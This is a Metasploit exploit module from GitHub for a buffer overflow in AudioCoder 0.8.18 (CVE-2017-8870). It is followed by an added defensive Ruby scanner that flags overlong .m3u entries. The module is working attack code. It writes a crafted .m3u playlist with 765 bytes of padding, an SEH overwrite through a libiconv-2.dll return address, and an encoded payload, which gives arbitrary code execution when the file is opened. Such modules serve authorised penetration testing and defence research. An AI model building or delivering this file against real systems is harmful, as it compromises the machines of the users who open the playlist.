GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/audio_coder_m3u.rb

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'AudioCoder .M3U Buffer Overflow',
      'Description' => %q{
          This module exploits a buffer overflow in AudioCoder 0.8.18. The vulnerability
        occurs when adding an .m3u, allowing arbitrary code execution with the privileges
        of the user running AudioCoder. This module has been tested successfully on
        AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'metacom', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2017-8870' ],
          [ 'OSVDB', '92939' ],
          [ 'EDB', '25141' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform' => 'win',
      'Payload' =>
        {
          'Space' => 6596,
          'BadChars' => "\x00\x5c\x40\x0d\x0a",
          'DisableNops' => true,
          'StackAdjustment' => -3500,
        },
      'Targets' =>
        [
          [ 'AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret' => 0x66011b56, # ppr from libiconv-2.dll
              'Offset' => 765
            }
          ]
        ],
      'Privileged' => false,
      'DisclosureDate' => '2013-05-01',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
      ])

  end

  def exploit
    buffer = "http://"
    buffer << rand_text(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded

    file_create(buffer)
  end
end
```
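
A defensive counterpart to the module above, as an added example that is not part of the Metasploit code base: the file the module writes is a single playlist entry that begins with `http://` and runs past the 765-byte offset, so a check before the file reaches a player can flag entries over a length limit. The 512-byte limit, the `scan_m3u` and `Finding` names, and the sample playlists are assumptions made for illustration.

```ruby
# Added example, not part of the Metasploit module: defensive triage of .m3u files.
# MAX_ENTRY_BYTES is an assumed policy limit, set below the 765-byte offset the
# module lists for AudioCoder 0.8.18.5353; tune it for your environment.
MAX_ENTRY_BYTES = 512

Finding = Struct.new(:line_no, :reason, :length)

URL_SCHEME = /\A[a-z][a-z0-9+.\-]*:\/\//in
NON_PRINTABLE = /[^\x20-\x7e]/n

# Scan raw playlist bytes and return a Finding for every suspicious entry.
def scan_m3u(data)
  findings = []
  # Work on bytes: an untrusted file may not be valid text in any encoding.
  data.b.split(/\r?\n/n).each_with_index do |line, idx|
    next if line.empty? || line.start_with?('#') # skip #EXTM3U / #EXTINF directives
    if line.bytesize > MAX_ENTRY_BYTES
      findings << Finding.new(idx + 1, :overlong_entry, line.bytesize)
    end
    # URLs should be percent-encoded ASCII; local paths may legitimately use
    # legacy code pages, so only URL entries get this check.
    if line.match?(URL_SCHEME) && line.match?(NON_PRINTABLE)
      findings << Finding.new(idx + 1, :non_ascii_url, line.bytesize)
    end
  end
  findings
end

# Constructed sample inputs (not real captures).
BENIGN = "#EXTM3U\n#EXTINF:123,Artist - Title\n" \
         "http://example.invalid/stream.mp3\nC:\\Music\\track01.mp3\n"
OVERLONG = "#EXTM3U\r\nhttp://" + ('A' * 900) + "\r\n"

if __FILE__ == $PROGRAM_NAME
  { 'benign' => BENIGN, 'overlong' => OVERLONG }.each do |name, data|
    results = scan_m3u(data)
    results.each { |f| puts "#{name}: line #{f.line_no} #{f.reason} (#{f.length} bytes)" }
    puts "#{name}: clean" if results.empty?
  end
end
```

A length limit is a triage signal, not a fix: the durable mitigation is removing or updating the vulnerable AudioCoder build.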